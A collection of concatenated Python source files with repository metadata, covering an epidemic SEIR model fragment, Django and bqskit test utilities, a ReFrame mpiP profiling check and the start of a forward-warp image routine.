        mortality_rate[i] = np_sum(new_deaths_over_time[:,i,:] )/total_population* 100000 # per 100,000

        # True up susceptible pools, total population and recovered pools between variants.
        # NOTE(review): epi[j][~v] relies on bitwise-NOT indexing (~0 == -1,
        # ~1 == -2) to pick "the other variant"; this is only correct when
        # nvars == 2 — confirm before configuring more than two variants.
        for j in range(0, nregions):
            for v in range(0,nvars):
                if nvars>1:
                    if i==0:
                        epi[j][v].S-= (np_sum(epi[j][~v].E_nr[1]) + np_sum(epi[j][~v].E_r[1]) + np_sum(epi[j][~v].Itot))
                    if i > 0:
                        epi[j][v].S= max(0, epi[j][v].S - (np_sum(epi[j][~v].E_nr[1]) + np_sum(epi[j][~v].E_r[1])))
                        epi[j][v].N -= ( epi[j][~v].new_deaths +epi[j][~v].new_deaths_reinf)
                        if epi_datetime_array[i] < epi[j][v].start_time:
                            epi[j][v].S= max(0, epi[j][v].S - (epi[j][~v].vaccinated_nr + epi[j][~v].vaccinated_r))
                            epi[j][v].R_nr = epi[j][~v].R_nr
                            epi[j][v].R_r = epi[j][~v].R_r
                        else:
                            epi[j][v].R_nr -= epi[j][~v].new_reexposed_nr
                            epi[j][v].R_r -= epi[j][~v].new_reexposed_r
                susceptible_over_time[j,i,v] = epi[j][v].S
                recovered_over_time[j,i,v] = np_sum(epi[j][v].R_nr) + np_sum(epi[j][v].R_r)
    return nvars, seir_params_multivar, nregions, regions, start_time, end_time, epi_datetime_array, susceptible_over_time, \
        exposed_over_time, infective_over_time, recovered_over_time, vaccinated_over_time, deaths_over_time, deaths_reinf_over_time, reexposed_over_time, reinfective_over_time, \
        rerecovered_over_time, hospitalization_index
33a772f892d4ed50cf326d5af75052977fcc4c7b | 695 | py | Python | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | 81 | 2022-03-04T23:46:02.000Z | 2022-03-19T13:06:46.000Z | body/tests/test_medicine.py | dylanjboyd/bodytastic | ee2299ba523c8c6b627028d70ab32b6da97cb2ea | [
"MIT"
] | null | null | null | from body.tests.login_test_case import LoginTestCase
from body.tests.model_helpers import create_ledger_entry, create_medicine
from freezegun import freeze_time
from django.utils.timezone import make_aware, datetime
@freeze_time(make_aware(datetime(2022, 3, 1)))
class MedicineTests(LoginTestCase):
    def test_ledger_recalculates(self):
        """Recalculating a medicine's balance sums its ledger entries."""
        # Two entries (+4 and -1) should net out to a current balance of 3.
        medicine = create_medicine(self.user)
        for quantity in (4, -1):
            create_ledger_entry(medicine, quantity)
        medicine.recalculate_balance_from_ledger()
        self.assertEqual(medicine.current_balance, 3)
| 38.611111 | 95 | 0.755396 | 429 | 0.617266 | 0 | 0 | 476 | 0.684892 | 0 | 0 | 111 | 0.159712 |
33a790e4cc50cc09ac9352f7aad0bd45b97fcd11 | 84 | py | Python | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/apps/users/forms/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from .user_change import UserChangeForm
from .user_creation import UserCreationForm
| 28 | 43 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33a9396a5c748b360eebc18de6c808b8faa43521 | 20,818 | py | Python | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 13 | 2021-05-26T21:32:26.000Z | 2022-03-15T17:48:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 20 | 2021-05-26T20:17:15.000Z | 2022-02-27T20:04:10.000Z | bqskit/utils/test/types.py | BQSKit/bqskit | 8471f28299a7fb49a2d9d82b24e49c331c9dec22 | [
"BSD-3-Clause-LBNL"
] | 2 | 2021-10-05T16:00:47.000Z | 2021-10-08T01:30:06.000Z | """This module contains functions to generate strategies from annotations."""
from __future__ import annotations
import collections
import inspect
import sys
from itertools import chain
from itertools import combinations
from typing import Any
from typing import Callable
from typing import Iterable
from typing import Sequence
import numpy as np
import pytest
from hypothesis import given
from hypothesis.extra.numpy import complex_number_dtypes
from hypothesis.extra.numpy import floating_dtypes
from hypothesis.extra.numpy import from_dtype
from hypothesis.strategies import booleans
from hypothesis.strategies import complex_numbers
from hypothesis.strategies import data
from hypothesis.strategies import dictionaries
from hypothesis.strategies import floats
from hypothesis.strategies import integers
from hypothesis.strategies import iterables
from hypothesis.strategies import just
from hypothesis.strategies import lists
from hypothesis.strategies import one_of
from hypothesis.strategies import SearchStrategy
from hypothesis.strategies import sets
from hypothesis.strategies import text
from hypothesis.strategies import tuples
from bqskit.utils.test.strategies import circuit_location_likes
from bqskit.utils.test.strategies import circuit_locations
from bqskit.utils.test.strategies import circuit_points
from bqskit.utils.test.strategies import circuit_regions
from bqskit.utils.test.strategies import circuits
from bqskit.utils.test.strategies import cycle_intervals
from bqskit.utils.test.strategies import everything_except
from bqskit.utils.test.strategies import gates
from bqskit.utils.test.strategies import operations
from bqskit.utils.test.strategies import unitaries
from bqskit.utils.test.strategies import unitary_likes
def _powerset(iterable: Iterable[Any]) -> Iterable[Any]:
"""
Calculate the powerset of an iterable.
Examples:
>>> list(powerset([1,2,3]))
... [() (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)]
References:
https://stackoverflow.com/questions/18035595/powersets-in-python-using-
itertools.
"""
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)))
def _split_generic_arguments(args: str) -> list[str]:
"""Split a generic's type arguments up."""
comma_indices = []
num_open_brackets = 0
for i, char in enumerate(args):
if char == '[':
num_open_brackets += 1
elif char == ']':
num_open_brackets -= 1
elif char == ',' and num_open_brackets == 0:
comma_indices.append(i)
if len(comma_indices) == 0:
return [args]
to_return: list[str] = []
last_index = 0
for comma_index in comma_indices:
to_return.append(args[last_index: comma_index])
last_index = comma_index + 1
to_return.append(args[last_index:])
return to_return
def type_annotation_to_valid_strategy(annotation: str) -> SearchStrategy[Any]:
    """Convert a type annotation into a hypothesis strategy.

    ``annotation`` is a string such as ``'int | Sequence[float]'``.  Each
    ``|``-separated alternative contributes one or more strategies and the
    result is their union (``one_of``).

    Raises:
        ValueError: If an alternative in ``annotation`` is not recognized.

    NOTE: the elif chain matches by prefix, so branch order matters
    (e.g. 'circuitpointlike' must be tested before 'circuitpoint', and
    both before the bare 'circuit' branch).
    """
    strategies: list[SearchStrategy[Any]] = []
    # RealVector is an alias; rewrite it into a form handled below.
    annotation = annotation.replace('RealVector', 'Sequence[float]')
    for type_str in annotation.split('|'):
        type_str = type_str.strip()
        if type_str == 'None':
            strategies.append(just(None))
        elif type_str == 'int':
            strategies.append(integers())
        elif type_str == 'float':
            strategies.append(floats())
            # Also draw numpy floating-point scalars, not just Python floats.
            strategies.append(floating_dtypes().flatmap(from_dtype))
        elif type_str == 'complex':
            strategies.append(complex_numbers())
            strategies.append(complex_number_dtypes().flatmap(from_dtype))
        elif type_str == 'bool':
            strategies.append(booleans())
        elif type_str == 'str':
            strategies.append(text())
        elif type_str == 'Any':
            # Any value is acceptable; None is the cheapest representative.
            strategies.append(just(None))
        elif type_str.lower().startswith('tuple'):
            # type_str[6:-1] strips the leading 'Tuple[' and trailing ']'.
            inner_strategies = []
            for arg in _split_generic_arguments(type_str[6:-1]):
                inner_strategies.append(type_annotation_to_valid_strategy(arg))
            strategies.append(tuples(*inner_strategies))
        elif type_str.lower().startswith('dict'):
            # type_str[5:-1] strips 'Dict[' and ']'.
            args = _split_generic_arguments(type_str[5:-1])
            key_strat = type_annotation_to_valid_strategy(args[0])
            val_strat = type_annotation_to_valid_strategy(args[1])
            strategies.append(dictionaries(key_strat, val_strat))
        elif type_str.lower().startswith('mapping'):
            args = _split_generic_arguments(type_str[8:-1])
            key_strat = type_annotation_to_valid_strategy(args[0])
            val_strat = type_annotation_to_valid_strategy(args[1])
            strategies.append(dictionaries(key_strat, val_strat))
        elif type_str.lower().startswith('list'):
            arg_strat = type_annotation_to_valid_strategy(type_str[5:-1])
            strategies.append(lists(arg_strat))
        elif type_str.lower().startswith('set'):
            arg_strat = type_annotation_to_valid_strategy(type_str[4:-1])
            strategies.append(sets(arg_strat))
        elif type_str.lower().startswith('sequence'):
            # Sequences are represented by lists.
            arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
            strategies.append(lists(arg_strat))
        elif type_str.lower().startswith('iterable'):
            arg_strat = type_annotation_to_valid_strategy(type_str[9:-1])
            strategies.append(iterables(arg_strat))
        elif type_str.lower().startswith('intervallike'):
            # An interval-like is either an (int, int) pair or a CycleInterval.
            strat = type_annotation_to_valid_strategy('Tuple[int, int]')
            strategies.append(strat)
            strategies.append(cycle_intervals())
        elif type_str.lower().startswith('cycleinterval'):
            strategies.append(cycle_intervals())
        elif type_str.lower().startswith('circuitpointlike'):
            strat = type_annotation_to_valid_strategy('Tuple[int, int]')
            strategies.append(strat)
            strategies.append(circuit_points())
        elif type_str.lower().startswith('circuitpoint'):
            strategies.append(circuit_points())
        elif type_str.lower().startswith('circuitregionlike'):
            strat = type_annotation_to_valid_strategy('dict[int, IntervalLike]')
            strategies.append(strat)
            strategies.append(circuit_regions())
        elif type_str.lower().startswith('circuitregion'):
            strategies.append(circuit_regions())
        elif type_str.lower().startswith('unitarylike'):
            strategies.append(unitary_likes())
        elif type_str.lower().startswith('unitarymatrix'):
            strategies.append(unitaries())
        elif type_str.lower().startswith('gate'):
            strategies.append(gates())
        elif type_str.lower().startswith('operation'):
            strategies.append(operations())
        elif type_str.lower().startswith('circuitlocationlike'):
            # NOTE(review): this branch draws circuit_locations() while the
            # branch below draws circuit_location_likes(); the two look
            # swapped -- confirm intent against bqskit's strategies module.
            strategies.append(circuit_locations())
        elif type_str.lower().startswith('circuitlocation'):
            strategies.append(circuit_location_likes())
        elif type_str.lower().startswith('circuit'):
            # Keep generated circuits tiny to bound test runtime.
            strategies.append(circuits(max_gates=1))
        else:
            raise ValueError(f'Cannot generate strategy for type: {type_str}')
    return one_of(strategies)
def type_annotation_to_invalid_strategy(annotation: str) -> SearchStrategy[Any]:
    """Convert a type annotation into an invalid hypothesis strategy.

    The returned strategy generates values that should *not* satisfy
    ``annotation``: scalars of any type other than the annotated ones, and
    containers of the annotated shape holding at least one ill-typed
    element.

    Raises:
        ValueError: If an alternative in ``annotation`` is not recognized.
    """
    strategies: list[SearchStrategy[Any]] = []
    # Scalar types that WOULD satisfy the annotation; everything_except()
    # below draws values outside this set.
    types_to_avoid: set[type] = set()
    # Element strategies for annotated container types, used after the loop
    # to build correctly-shaped containers with invalid contents.
    tuple_valids: dict[int, set[SearchStrategy[Any]]] = {}
    tuple_invalids: dict[int, set[SearchStrategy[Any]]] = {}
    dict_key_valids: set[SearchStrategy[Any]] = set()
    dict_key_invalids: set[SearchStrategy[Any]] = set()
    dict_val_valids: set[SearchStrategy[Any]] = set()
    dict_val_invalids: set[SearchStrategy[Any]] = set()
    list_invalids: set[SearchStrategy[Any]] = set()
    set_invalids: set[SearchStrategy[Any]] = set()
    iterable_invalids: set[SearchStrategy[Any]] = set()
    annotation = annotation.replace('RealVector', 'Sequence[float]')
    for type_str in annotation.split('|'):
        type_str = type_str.strip()
        if type_str == 'None':
            types_to_avoid.add(type(None))
        elif type_str == 'int':
            # Exclude every integer representation, including numpy's.
            types_to_avoid.add(int)
            types_to_avoid.add(np.byte)
            types_to_avoid.add(np.short)
            types_to_avoid.add(np.intc)
            types_to_avoid.add(np.longlong)
            types_to_avoid.add(np.int8)
            types_to_avoid.add(np.int16)
            types_to_avoid.add(np.int32)
            types_to_avoid.add(np.int64)
        elif type_str == 'float':
            types_to_avoid.add(float)
            types_to_avoid.add(np.half)
            types_to_avoid.add(np.single)
            types_to_avoid.add(np.double)
            types_to_avoid.add(np.longdouble)
            types_to_avoid.add(np.float32)
            types_to_avoid.add(np.float64)
        elif type_str == 'complex':
            types_to_avoid.add(complex)
            types_to_avoid.add(np.csingle)
            types_to_avoid.add(np.cdouble)
            types_to_avoid.add(np.clongdouble)
            types_to_avoid.add(np.complex64)
            types_to_avoid.add(np.complex128)
        elif type_str == 'bool':
            types_to_avoid.add(bool)
            types_to_avoid.add(np.bool_)
        elif type_str == 'str':
            types_to_avoid.add(str)
        elif type_str == 'Any':
            # Everything is valid for Any; nothing to exclude.
            continue
        elif type_str.lower().startswith('tuple'):
            args = _split_generic_arguments(type_str[6:-1])
            if len(args) not in tuple_valids:
                tuple_valids[len(args)] = set()
                tuple_invalids[len(args)] = set()
            # NOTE: element strategies are merged per tuple length, so a
            # "valid" slot may draw from any position's valid strategy.
            for arg in args:
                valid_strat = type_annotation_to_valid_strategy(arg)
                invalid_strat = type_annotation_to_invalid_strategy(arg)
                tuple_valids[len(args)].add(valid_strat)
                tuple_invalids[len(args)].add(invalid_strat)
            types_to_avoid.add(tuple)
        elif type_str.lower().startswith('dict'):
            args = _split_generic_arguments(type_str[5:-1])
            # Fixed: the key/value strategy sets were crossed -- the
            # "invalid key" set held valid *value* strategies and the
            # "valid value" set held invalid *key* strategies.
            dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
            dict_key_invalids.add(type_annotation_to_invalid_strategy(args[0]))
            dict_val_valids.add(type_annotation_to_valid_strategy(args[1]))
            dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
            types_to_avoid.add(dict)
            types_to_avoid.add(map)
        elif type_str.lower().startswith('mapping'):
            args = _split_generic_arguments(type_str[8:-1])
            # Fixed: same key/value crossing as the dict branch above.
            dict_key_valids.add(type_annotation_to_valid_strategy(args[0]))
            dict_key_invalids.add(type_annotation_to_invalid_strategy(args[0]))
            dict_val_valids.add(type_annotation_to_valid_strategy(args[1]))
            dict_val_invalids.add(type_annotation_to_invalid_strategy(args[1]))
            types_to_avoid.add(dict)
            types_to_avoid.add(map)
        elif type_str.lower().startswith('list'):
            arg_strat = type_annotation_to_invalid_strategy(type_str[5:-1])
            list_invalids.add(arg_strat)
            types_to_avoid.add(list)
        elif type_str.lower().startswith('set'):
            arg_strat = type_annotation_to_invalid_strategy(type_str[4:-1])
            set_invalids.add(arg_strat)
            types_to_avoid.add(set)
            types_to_avoid.add(collections.abc.MutableSet)
        elif type_str.lower().startswith('sequence'):
            arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
            list_invalids.add(arg_strat)
            types_to_avoid.add(Sequence)
            types_to_avoid.add(list)
            types_to_avoid.add(tuple)
            types_to_avoid.add(bytearray)
            types_to_avoid.add(bytes)
        elif type_str.lower().startswith('iterable'):
            arg_strat = type_annotation_to_invalid_strategy(type_str[9:-1])
            iterable_invalids.add(arg_strat)
            # Anything iterable counts as valid, so exclude all of them.
            types_to_avoid.add(Sequence)
            types_to_avoid.add(list)
            types_to_avoid.add(tuple)
            types_to_avoid.add(Iterable)
            types_to_avoid.add(set)
            types_to_avoid.add(frozenset)
            types_to_avoid.add(dict)
            types_to_avoid.add(str)
            types_to_avoid.add(bytearray)
            types_to_avoid.add(bytes)
            types_to_avoid.add(collections.abc.MutableSet)
            types_to_avoid.add(enumerate)
            types_to_avoid.add(map)
            types_to_avoid.add(range)
            types_to_avoid.add(reversed)
        elif type_str.lower().startswith('intervallike'):
            types_to_avoid.add(tuple)
        elif type_str.lower().startswith('cycleinterval'):
            continue
        elif type_str.lower().startswith('circuitpointlike'):
            types_to_avoid.add(tuple)
        elif type_str.lower().startswith('circuitpoint'):
            continue
        elif type_str.lower().startswith('circuitregionlike'):
            types_to_avoid.add(dict)
        elif type_str.lower().startswith('circuitregion'):
            continue
        elif type_str.lower().startswith('circuitlocationlike'):
            types_to_avoid.add(int)
            types_to_avoid.add(Sequence)
            types_to_avoid.add(Iterable)
            types_to_avoid.add(list)
            types_to_avoid.add(tuple)
            types_to_avoid.add(collections.abc.MutableSet)
            types_to_avoid.add(enumerate)
            types_to_avoid.add(range)
            types_to_avoid.add(reversed)
        elif type_str.lower().startswith('circuitlocation'):
            continue
        elif type_str.lower().startswith('unitarylike'):
            types_to_avoid.add(np.ndarray)
        elif type_str.lower().startswith('unitarymatrix'):
            continue
        elif type_str.lower().startswith('gate'):
            continue
        elif type_str.lower().startswith('operation'):
            continue
        elif type_str.lower().startswith('circuit'):
            continue
        else:
            raise ValueError(f'Cannot generate strategy for type: {type_str}')
    # Plain scalars of any non-avoided type are invalid values.
    strategies.append(everything_except(tuple(types_to_avoid)))
    # Tuples of the right arity where at least one slot is ill-typed.
    # _powerset yields only proper subsets, so the all-valid tuple is
    # never produced.
    for tuple_len in tuple_valids:
        for valid_set in _powerset(list(range(tuple_len))):  # (), (0,), (1,)
            strategy_builder = []
            for i in range(tuple_len):
                if i in valid_set:
                    strat = one_of(list(tuple_valids[tuple_len]))
                    strategy_builder.append(strat)
                else:
                    strat = one_of(list(tuple_invalids[tuple_len]))
                    strategy_builder.append(strat)
            strategies.append(tuples(*strategy_builder))
    # Dicts with invalid keys and/or invalid values (never all-valid).
    if len(dict_val_invalids) > 0:
        strategies.append(
            dictionaries(
                one_of(list(dict_key_valids)),
                one_of(list(dict_val_invalids)),
                min_size=1,
            ),
        )
        strategies.append(
            dictionaries(
                one_of(list(dict_key_invalids)),
                one_of(list(dict_val_valids)),
                min_size=1,
            ),
        )
        strategies.append(
            dictionaries(
                one_of(list(dict_key_invalids)),
                one_of(list(dict_val_invalids)),
                min_size=1,
            ),
        )
    if len(list_invalids) > 0:
        strategies.append(lists(one_of(list(list_invalids)), min_size=1))
    if len(set_invalids) > 0:
        strategies.append(sets(one_of(list(set_invalids)), min_size=1))
    if len(iterable_invalids) > 0:
        strategies.append(
            iterables(
                one_of(
                    list(iterable_invalids),
                ),
                min_size=1,
            ),
        )
    return one_of(strategies)
def invalid_type_test(
    func_to_test: Callable[..., Any],
    other_allowed_errors: Sequence[type] = (),
) -> Callable[..., Callable[..., None]]:
    """
    Decorator to generate invalid type tests.

    An invalid type test ensures that a function called with incorrect
    types raises a TypeError (or one of ``other_allowed_errors``).
    Examples:
        >>> class Foo:
        ...     def foo(self, x: int, y: int) -> None:
        ...         if not is_integer(x):
        ...             raise TypeError("")
        ...         if not is_integer(y):
        ...             raise TypeError("")
        >>> class TestFoo:
        ...     @invalid_type_test(Foo().foo)
        ...     def test_foo_invalid_type(self) -> None:
        ...         pass
        >>> @invalid_type_test(Foo().foo)
        ... def test_foo_invalid_type(self) -> None:
        ...     pass
    """
    # The strategy machinery relies on annotation syntax only supported
    # from Python 3.9 on; silently skip generation on older interpreters.
    if sys.version_info[0] == 3 and sys.version_info[1] < 9:
        return lambda x: x
    valids = []
    invalids = []
    for _, param in inspect.signature(func_to_test).parameters.items():
        if param.annotation == inspect._empty:  # type: ignore
            raise ValueError(
                'Need type annotation to generate invalid type tests.',
            )
        valids.append(type_annotation_to_valid_strategy(param.annotation))
        invalids.append(type_annotation_to_invalid_strategy(param.annotation))
    # One strategy per proper subset of "valid" argument positions; the
    # remaining positions draw invalid values, so every generated call has
    # at least one ill-typed argument (_powerset excludes the full set).
    strategies = []
    for valid_set in _powerset(list(range(len(valids)))):
        strategy_builder = []
        for i in range(len(valids)):
            if i in valid_set:
                strategy_builder.append(valids[i])
            else:
                strategy_builder.append(invalids[i])
        strategies.append(tuples(*strategy_builder))
    # Hoisted out of the generated test bodies; also the reason the default
    # is an immutable tuple instead of a mutable list.
    expected_errors = (TypeError,) + tuple(other_allowed_errors)
    def inner(f: Callable[..., Any]) -> Callable[..., None]:
        # Emit a method when the decorated test lives inside a class.
        if 'self' in inspect.signature(f).parameters:
            @pytest.mark.parametrize('strategy', strategies)
            @given(data=data())
            def invalid_type_test(self: Any, strategy: Any, data: Any) -> None:
                args = data.draw(strategy)
                with pytest.raises(expected_errors):
                    func_to_test(*args)
            return invalid_type_test
        else:
            @pytest.mark.parametrize('strategy', strategies)
            @given(data=data())
            def invalid_type_test(strategy: Any, data: Any) -> None:
                args = data.draw(strategy)
                with pytest.raises(expected_errors):
                    func_to_test(*args)
            return invalid_type_test
    return inner
def valid_type_test(
    func_to_test: Callable[..., Any],
) -> Callable[..., Callable[..., None]]:
    """
    Decorator to generate valid type tests.

    A valid type test ensures that a function called with correct types
    does not raise a TypeError.
    Examples:
        >>> class Foo:
        ...     def foo(self, x: int, y: int) -> None:
        ...         if not is_integer(x):
        ...             raise TypeError("")
        ...         if not is_integer(y):
        ...             raise TypeError("")
        >>> class TestFoo:
        ...     @valid_type_test(Foo().foo)
        ...     def test_foo_valid_type(self) -> None:
        ...         pass
        >>> @valid_type_test(Foo().foo)
        ... def test_foo_valid_type(self) -> None:
        ...     pass
    """
    # Strategy generation needs Python 3.9+ annotation support.
    if sys.version_info[0] == 3 and sys.version_info[1] < 9:
        return lambda x: x
    # One valid strategy per parameter, drawn together as a tuple.
    param_strategies = []
    for _, param in inspect.signature(func_to_test).parameters.items():
        if param.annotation == inspect._empty:  # type: ignore
            raise ValueError(
                'Need type annotation to generate invalid type tests.',
            )
        param_strategies.append(
            type_annotation_to_valid_strategy(param.annotation),
        )
    strategy = tuples(*param_strategies)
    def _check(args: Any) -> None:
        # Only a TypeError is a failure; other exceptions may legitimately
        # be raised by well-typed but semantically invalid inputs.
        try:
            func_to_test(*args)
        except TypeError:
            assert False, 'Valid types caused TypeError.'
        except Exception:
            pass
    def inner(f: Callable[..., Any]) -> Callable[..., None]:
        # Emit a method when the decorated test lives inside a class.
        if 'self' in inspect.signature(f).parameters:
            @given(data=strategy)
            def valid_type_test(self: Any, data: Any) -> None:
                _check(data)
            return valid_type_test
        @given(data=strategy)
        def valid_type_test(data: Any) -> None:
            _check(data)
        return valid_type_test
    return inner
| 35.893103 | 80 | 0.619944 | 0 | 0 | 0 | 0 | 1,232 | 0.05918 | 0 | 0 | 2,955 | 0.141944 |
33a977da8d2c47f04abb08e18a45125c2af8f923 | 3,600 | py | Python | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 3 | 2020-02-18T12:48:08.000Z | 2021-02-06T01:43:30.000Z | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 5 | 2020-03-28T11:59:57.000Z | 2020-08-28T08:46:02.000Z | reframechecks/mpip/mpip.py | reframe-hpc/hpctools | ad3efe478334fabb7f64aa3d1566c88e4c488aaf | [
"BSD-3-Clause"
] | 3 | 2020-03-17T16:10:56.000Z | 2020-07-10T06:24:34.000Z | # Copyright 2019-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# HPCTools Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import sys
import reframe as rfm
import reframe.utility.sanity as sn
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
'../common'))) # noqa: E402
import sphexa.hooks as hooks
import sphexa.sanity as sphs
import sphexa.sanity_mpip as sphsmpip
# {{{ class SphExa_mpiP_Check
@rfm.simple_test
class SphExa_mpiP_Check(rfm.RegressionTest, hooks.setup_pe,
                        hooks.setup_code):
    # {{{
    '''
    This class runs the test code with mpiP (mpi+openmp):
    http://llnl.github.io/mpiP
    '''
    # }}}
    # ReFrame test parameters: solver iterations, node counts, and
    # particles per core (sets the per-run problem size).
    steps = parameter([4])
    compute_node = parameter([2])
    # compute_node = parameter([100, 200, 300, 400, 500])
    np_per_c = parameter([1e4])
    # Consumed by the setup hooks to enable mpiP-specific build/run flags.
    mpip_flags = variable(bool, value=True)
    def __init__(self):
        # {{{ pe
        self.descr = 'Tool validation'
        self.valid_prog_environs = ['*']
        self.valid_systems = ['*']
        self.modules = ['mpiP']
        self.maintainers = ['JG']
        self.tags = {'sph', 'hpctools', 'cpu'}
        # }}}
        # {{{ compile
        self.testname = 'sedov'
        self.tool = 'pprof'
        self.which_rpt = 'which.rpt'
        self.prebuild_cmds = [
            # f'which {self.tool} &> {self.which_rpt}',
            # f'which $EBROOTPPROF/bin/{self.tool} >> {self.which_rpt}',
        ]
        # }}}
        # {{{ run
        # mpiP report can be tuned via the MPIP environment variable:
        # self.variables = {'MPIP': '"-c"',}
        # -c: concise version of report
        # -d: suppress callsite details
        # -p: report histogram of point-to-point MPI calls
        # -y: report histogram of collective MPI calls
        #
        # libpath = '$EBROOTMPIP/lib'
        # self.variables['LD_LIBRARY_PATH'] = f'{libpath}:$LD_LIBRARY_PATH'
        self.rpt_file = 'mpip.rpt'
        # Visual separator in the job output after the run.
        self.postrun_cmds += [
            f'# -------------------------------------------------------------',
            f'# -------------------------------------------------------------',
        ]
        # }}}
        # {{{ sanity
        self.sanity_patterns = sn.all([
            # check the job output:
            sn.assert_found(r'Total time for iteration\(0\)', self.stdout),
            # check the tool report:
            sn.assert_found('^mpiP: Storing mpiP output in ', self.stdout),
        ])
        # }}}
    # {{{ hooks
    @rfm.run_before('performance')
    def set_tool_perf_patterns(self):
        """Register mpiP-derived metrics as ReFrame performance patterns."""
        self.perf_patterns.update({
            'mpip_avg_mpi_time': sphsmpip.mpip_perf_patterns(self, 1),
            'mpip_avg_app_time': sphsmpip.mpip_perf_patterns(self, 2),
            '%mpip_avg_mpi_time_max': sphsmpip.mpip_perf_patterns(self, 5),
            '%mpip_avg_mpi_time': sphsmpip.mpip_perf_patterns(self, 3),
            '%mpip_avg_mpi_time_min': sphsmpip.mpip_perf_patterns(self, 6),
            '%mpip_avg_non_mpi_time': sphsmpip.mpip_perf_patterns(self, 4),
        })
    @rfm.run_before('performance')
    def set_tool_perf_reference(self):
        """Attach (0, None, None, unit) references so every metric is
        reported without pass/fail bounds."""
        myzero_s = (0, None, None, 's')
        myzero_p = (0, None, None, '%')
        self.reference['*:mpip_avg_mpi_time'] = myzero_s
        self.reference['*:mpip_avg_app_time'] = myzero_s
        self.reference['*:%mpip_avg_mpi_time_max'] = myzero_p
        self.reference['*:%mpip_avg_mpi_time'] = myzero_p
        self.reference['*:%mpip_avg_mpi_time_min'] = myzero_p
        self.reference['*:%mpip_avg_non_mpi_time'] = myzero_p
    # }}}
# }}}
| 34.951456 | 79 | 0.570833 | 3,056 | 0.848889 | 0 | 0 | 3,073 | 0.853611 | 0 | 0 | 1,517 | 0.421389 |
33a9e48d845125b9644014be228bb6ef28ca1951 | 4,743 | py | Python | Forward_Warp/python/forward_warp_python.py | hologerry/Forward-Warp | 82a32a372383b3c69f9666cb5b8189dbfb05d328 | [
"MIT"
] | 81 | 2019-07-04T20:51:34.000Z | 2022-03-26T15:58:42.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2020-05-04T04:59:16.000Z | 2021-12-21T19:06:31.000Z | Forward_Warp/python/forward_warp_python.py | wbhu/Forward-Warp | 90e7e32f2c0e666ffc029b7b274b30b3a45cd3ce | [
"MIT"
] | 9 | 2019-09-04T02:09:12.000Z | 2021-11-27T09:31:49.000Z | import torch
from torch.nn import Module, Parameter
from torch.autograd import Function
class Forward_Warp_Python:
    """Pure-Python reference implementation of forward warping.

    ``forward`` splats every source pixel of ``im0`` (NCHW) to the target
    location given by the per-pixel ``flow`` (NHW2; ``flow[..., 0]`` is
    the x/width offset, ``flow[..., 1]`` the y/height offset).
    ``interpolation_mode == 0`` selects bilinear splatting; any other
    value selects nearest-neighbour.  ``backward`` computes the matching
    gradients for ``im0`` and ``flow``.
    """
    @staticmethod
    def forward(im0, flow, interpolation_mode):
        """Warp ``im0`` forward along ``flow``; return the warped image."""
        im1 = torch.zeros_like(im0)
        B = im0.shape[0]
        H = im0.shape[2]
        W = im0.shape[3]
        if interpolation_mode == 0:
            # Bilinear: distribute each source pixel over the four target
            # pixels around its warped position, weighted by overlap area.
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + flow[b, h, w, 0]
                        y = h + flow[b, h, w, 1]
                        nw = (int(torch.floor(x)), int(torch.floor(y)))
                        ne = (nw[0]+1, nw[1])
                        sw = (nw[0], nw[1]+1)
                        se = (nw[0]+1, nw[1]+1)
                        p = im0[b, :, h, w]
                        # Pixels whose 2x2 footprint is not fully inside
                        # the image are dropped entirely.
                        if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
                            nw_k = (se[0]-x)*(se[1]-y)
                            ne_k = (x-sw[0])*(sw[1]-y)
                            sw_k = (ne[0]-x)*(y-ne[1])
                            se_k = (x-nw[0])*(y-nw[1])
                            im1[b, :, nw[1], nw[0]] += nw_k*p
                            im1[b, :, ne[1], ne[0]] += ne_k*p
                            im1[b, :, sw[1], sw[0]] += sw_k*p
                            im1[b, :, se[1], se[0]] += se_k*p
        else:
            # Nearest neighbour: round the flow and copy the pixel.
            round_flow = torch.round(flow)
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + int(round_flow[b, h, w, 0])
                        y = h + int(round_flow[b, h, w, 1])
                        if x >= 0 and x < W and y >= 0 and y < H:
                            im1[b, :, y, x] = im0[b, :, h, w]
        return im1
    @staticmethod
